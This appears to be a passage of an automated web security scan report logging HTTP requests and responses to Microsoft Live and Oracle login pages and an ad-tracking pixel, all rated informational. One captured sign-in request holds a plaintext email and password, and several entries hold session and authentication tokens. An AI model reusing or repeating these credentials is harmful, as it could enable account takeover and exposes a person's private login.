User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdissOwiAQAP9lv2ChrMByIoVDkx6MjYm3BqgkPWl9xIPx30Uvk8lkEnf8vjfAcQjgmkkGtZw7TIRYTNllk6stOWmylpAySfv%252FGMZDD25lQQJRadGiEAzPdZknicqH0%252B%252BTmqH3cYr7V%252FCPOcehXvw2VrNdjbwVcJ8v8vQj9g%253D%253D; myPAL=eJydkL0OwjAMhN8Frxls5z%252BdCixItKoAIVbGzozAu2OnUikbsCRRfPfZ52tJ5T4WbG6FUlmRxwQ5ZwJCB%252BgRVs1YSKrBapUQMkdmMi5ni2RE6%252FUIQDECIkG7PplDdzHt0Jt2ezFHRif3A0lRLCg7o2Yzazcxz2JWsVVx%252FLKvGpwYeDLwIkZAOMmjk5%252FK9ZonVFkEFkA0lLMju8Q6P8fZ9ecaabPvPiNZpQWhJaq0NE2J5p8lSRdZ0vtZR40C9%252B43eB1v6OvGny8z0mru; BFF=eJzNlLtuwzAMRf%252FFXyBSthXJS9JmqIHYNRojaKcgY%252BeObf698iMyRUk1EGToeg8fevDyYiSY7y8DwmS7p36rUSFCVn0aKEBUFkiTNa9t%252F3L4OJ%252FqY91n1cXk5Z85ctRpERv51rxHI60eiQStpcIIyC0QwMCua%252BOn6FoeuY%252Bfwuo0sjDZEUVu1R8BW611yeoslAJ0gOcoR1JtcEgpUm0w3Ybn9CDyZgC3HLSgmHUiebGSAD19K4JSapbVJNftKZDlKPtxw0fxOPKzOUg%252F%252FvnQxOpa2Y8bbhzULckzyWjbBVMgl1eMJbnJFjPY8EHmwE1hAPaxjPnz7ePNM1awtIVSgA7wHOUIjS9JIfRuGvRBCuTSJ0i6zW3XMnvQkhONHH18Jz9HOeLEa2JtbKrElqBD5m2J4H%252BC9RFbCis7IG31FVffYd4HOfVBxrzTh%252F%252FbbmlXrRnofp%252Bk7HD9BfU7zdg%253D; TFF=eJydlEESgyAMRe%252FSEyQBTMGNx%252BjWhYvOdNfuOr17U1sRCTjUhRN0%252FiPE5DMGA%252BF5D0jhhGAHcDB47%252BnUj4HC8xqwl8fBWQIsy5fS40dvMj3139eU44i1ERLBbpVIPyXpvafLdBsfU7Y3LnsXq2AeALBUNa56hFlvEz0xUV53zGR3SPTeMB0hrZDQnnNbnTvIda0cR6yNkMj8x5noMziVTsG%252BXtUOatqKnKq9xnHE2gj5puZ670yzabqiN3H1gSy1Xp2IdB5Kvdnl3qwScybrql3hVc%252Bz3qx6kuZznoh1Io4m%252BIFiH4vmIFkwXpXcFqdGqJFTI1TjOGJthETr%252FvkL6cWlWrwYLxkmuSJfb5jEiM8%253D; EVX=eJzFkUEKwkAMRe%252FSE%252BRnMk2TOUzoctYupXd3IkKLFVQQXCbv5%252FMgq6tfuxsrM9rqnBO1i2PxCRUUGlANIkQNnlp37HQ50Dnp1l3MCv2myszqKJKvipIyyYMiKe9U81bqkZa3EvPfJXgsdFjgyeLUNLIwE5QPw%252FfH04vw2WK7AWPGi2o%253D

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxdjssKgzAQRf9lvmCSzDTJuArqQpAilUJ3YmIDrlr7oIvSf6912d3lcA7cUUjedzECx6aCYl1agKazwZERk0u76GL2KY6WvWfkyNpvnkB7KKGYRbFCJKtWqJTAc56GXiOF6vTztBUoQ93X3asKjyHWTb6Epc1uuTp9S%252FBfdfsN%252BfUFWSRmtkaz8ciGEIrPF3QcLtM%253D; expires=Mon, 27-Jun-2011 02:21:17 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJydkL1SAzEMhN8lalVI8q%252Bc6ggNM9xNBjJMWsrUKYF3j%252BQDc3RAY2vs1SftvjZtb5dG%252B2vj2nacqIKqMjBFoESw218a228O%252FssEKkWEMaoGYjRt8iMDlwJEDNPdCZ%252FmM07HBaf7Mz4LRbvfiR0lhgoDNZrFp1nzEIuLg4vLL%252Bd6Q7QGWRtkYyMTnKyY7aVzk%252FvJXVZADFCQVSOHLTamYedheemWDo%252FzT0vBadlolTutrlsS%252Fickm2IhfZd91WLwFP8G7%252Bsdl8%252FEq4eoXwQTr2HzRic4SnP0cQOlIHaz; expires=Thu, 28-Apr-2011 02:21:17 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJzNlLtuwzAMRf%252FFXyCRthXJS9JmqIHYNRojaKcgY%252BeObf%252B98iMS9YoBN0NWHl5Soqh7USjV95fiTGW7p34rQQDwrPpUvOCs0gBV1ry2%252Fcvh43yqj3WfVRdVlDc1OMZpEZ351rxHM3U8ksmlRAERkGvAuAd2XRs%252FRdf6mfv4KXScZhYqOwLLdfSH8a2UsvTqWEoBGOBrhCGpNjBIilQbSLfxNT1neTOAqwY0KOY4CTm5SICcnhW4EGIOiylct6cgjGPYzRseys8jL5tzdPOfD02srg67ecONg7olGRNG21pMAdopxkRms9kMNv4i%252B8BsYQD2McX8%252BHp4844VnsxSCsAAXyMMofklKQTOTYM%252BQAHaPoHourdd630PWnKikaOPc3I1wpBUG0hNaKLpNo5GEA26RhDURApyUjNQlU7VYFpotQGLHIjd6mvhb8JWN%252B5fsy5KP6HjosH%252BBvYaM80Fj0xb4YLrrTC3OznZnYxrpU89th2lXWfJYNb7SNouFpzhHwbwgP%252F8D9t%252BSns%253D; expires=Mon, 27-Jun-2011 02:21:17 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlE0SgyAMhe%252FSEyQBTMGNx%252BjWhYvOdNfuOr17U1sRCTjUhRN%252F3kfyJGEMhsLzHpDCCcEO4GDw3tOpH4N8uAbs5XJwlgDL7Uvp8aM3mZ7672PKccTaCIlgt0qkn5L02tNluo2PKVsbl7V9yQXzAIAl17i6Rpj1NtETE%252BW%252BYya7Q6L3hukIaYWE9pxbd%252B4g17VyHLE2QiLzHzXRp3EqOwX7euUdVLcVOeW9xnHE2gh5p%252Fp68U6Fmuah6YqziYmeCnpVEemKKJ3NLp%252FNKjFnsq66K7zqedabVU%252By%252BZwnYp2I4xD8QBkfi%252BYgWRi8Krk1p1qokVMtVOM4Ym2EROv%252B%252BQvpwaW2uNB8581A4P4hghnHEWsjXm%252FFSKNd; expires=Mon, 27-Jun-2011 02:21:17 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 27-Feb-2010 02:21:16 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 27-Feb-2010 02:21:16 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJzFkkEKwzAMBP%252BSF2hlO4rkx5gcfe6x5O%252BVQkvSpoQWCj1Ks15G4NnErt2UhRl1No6J6sUw2YACatIg0ojQSuOhdsNGpx0dgy7dsmqi31SpavGi8lVRUKZ8pwjKG5V4m8uephMJP%252BeZrs0Iiofi6Ir5f4ouwb4Qt8CLxaHJs1DNSB%252BG129Bb8JHi%252BUG6luSvA%253D%253D; expires=Mon, 27-Jun-2011 02:21:17 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Sun, 27 Feb 2011 02:21:17 GMT
Server: HTTP server


7.336. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 27 Feb 2011 19:20:33 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 27 Feb 2011 19:19:33 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1K35 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1298834433&co=1&id=74335; path=/;version=1
Set-Cookie: MSPOK=$uuid-5bd48ba2-ab44-4ffc-981d-714b93d159f4; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Vary: Accept-Encoding
Content-Length: 13967

<!-- ServerInfo: BAYIDSLGN1K35 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA032, -- Version: 10,0,17147,0 -->
<html dir="ltr"><head><meta http-equiv="Content-T
...[SNIP]...

7.337. https://login.live.com/ppsecure/post.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Request

POST /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335&bk=1298834433 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Cache-Control: max-age=0
Origin: https://login.live.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MSPRequ=lt=1298834433&co=1&id=74335; MSPOK=$uuid-6278c8d3-acda-423f-b793-0efb77b580bc; CkTst=G1298834441147; wlidperf=throughput=4&latency=706&FR=L&ST=1298834452429
Content-Length: 366

PPSX=Passpor&PwdPad=IfYouAreReadingThisYouHaveTooMuc&type=&login=h02332%40hotmail.com&passwd=Fast1Dial&SI=++++Sign+in++++&LoginOptions=3&PPFT=CdjHnXKmnVrIBGTkU6SmPpO2VVZI9x6P4ZzUI5WYDzPQ0YmZpFGpWpsRsG
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 27 Feb 2011 19:20:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 27 Feb 2011 19:19:46 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1K41 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK= ; expires=Thu, 30-Oct-1980 16:00:00 GMT;domain=login.live.com;path=/;HTTPOnly= ;version=1
Set-Cookie: PPAuth=Abs099g4g6XbK0ghCvK7b084yVBbRdAjhz!Fvx4mwXWY0iEV4!tmovrhWeQR3Y4IgBxMZMN7rqGmT38mpQBozshcu09BP1zJKhbMaMpymxBgUi!q7A65MWyIc2IaBEWtRwzUnRAytk3obyHw8P74!3UBe2H2Dq!coCK6UfbESoaPCRL1!pFWR!bYjfguwWFuoxCWup65SOX1q1QE!SLQJM0H46oRRis97AO9*mI$; domain=login.live.com;secure= ;path=/;HTTPOnly= ;version=1
Set-Cookie: PPLState=1; domain=.live.com;path=/;version=1
Set-Cookie: MSPShared=1; expires=Wed, 30-Dec-2037 16:00:00 GMT;domain=login.live.com;path=/;HTTPOnly= ;version=1
Set-Cookie: MSPPre= ;domain=login.live.com;path=/;Expires=Thu, 30-Oct-1980 16:00:00 GMT
Set-Cookie: MSPCID= ; HTTPOnly= ; domain=login.live.com;path=/;Expires=Thu, 30-Oct-1980 16:00:00 GMT
Set-Cookie: MSPVis=$74335;domain=login.live.com;path=/
Set-Cookie: pres=; expires=Thu, 30-Oct-1980 16:00:00 GMT;domain=.live.com;path=/;version=1
Set-Cookie: LOpt=0; domain=login.live.com;path=/;version=1
Set-Cookie: MSPSoftVis=@72198325083833620@:@; domain=login.live.com;path=/;version=1
Set-Cookie: MSPBack=1298834433; domain=login.live.com;path=/;version=1
Vary: Accept-Encoding
Content-Length: 1740

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...

7.338. https://login.oracle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:31 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Sun, 02 Nov 2008 12:36:45 GMT
ETag: "137850-0-490d9edd"
Accept-Ranges: bytes
Content-Length: 0
Connection: close
Content-Type: image/x-icon
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:31 GMT; path=/


7.339. https://login.oracle.com/mysso/signon.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Request

GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/
Content-Length: 8754

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...

7.340. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Feb 2011 23:28:34 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Content-Length: 4677
Set-Cookie: ORASSO_AUTH_HINT=v1.0~20110227072834; Domain=.oracle.com; Path=/
Cache-Control: private
Location: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6